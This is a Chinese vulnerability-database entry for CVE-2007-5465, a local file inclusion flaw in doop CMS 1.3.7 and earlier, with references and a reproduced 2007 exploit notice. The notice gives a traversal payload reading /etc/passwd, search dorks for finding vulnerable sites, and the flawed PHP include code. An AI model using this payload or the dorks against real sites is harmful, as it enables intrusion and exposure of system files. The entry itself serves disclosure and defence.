doop CMS 未明组件目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113801 漏洞类型 路径遍历
发布时间 2007-10-15 更新时间 2009-04-29
CVE编号 CVE-2007-5465 CNNVD-ID CNNVD-200710-295
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/4536
https://www.securityfocus.com/bid/26075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-295
|漏洞详情
doopCMS1.3.7版本及其早期版本中存在目录遍历漏洞。远程攻击者可以借助对一个未明组件的页参数中的一个..,包含和执行任意本地文件。
|漏洞EXP
______________________________________________________
|         DOOP CMS <=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists("pages/".$cpage.".htm")){         |
|        include("pages/".$cpage.".htm");              |
|    }                                                 |
|    else include("pages/".$cpage.".html");            |
|   }                                                  |
|______________________________________________________|
 ______________________________________________________
| greetz to: http://vladii.wordpress.com               |
|            http://rstzone.org                        |
|            http://hackpedia.info                     |
|            SlicK & Shocker & moubik & kw3            |
|______________________________________________________|

 ______________________________________________________
|                  @vladii 2007                        |
|______________________________________________________| 

# milw0rm.com [2007-10-15]
|受影响的产品
Mydoop.org doop 1.3.7
|参考资料

来源:MILW0RM
名称:4536
链接:http://www.milw0rm.com/exploits/4536
来源:OSVDB
名称:37864
链接:http://osvdb.org/37864
来源:XF
名称:doop-index-file-include(37205)
链接:http://xforce.iss.net/xforce/xfdb/37205
来源:BID
名称:26075
链接:http://www.securityfocus.com/bid/26075
来源:SECUNIA
名称:27255
链接:http://secunia.com/advisories/27255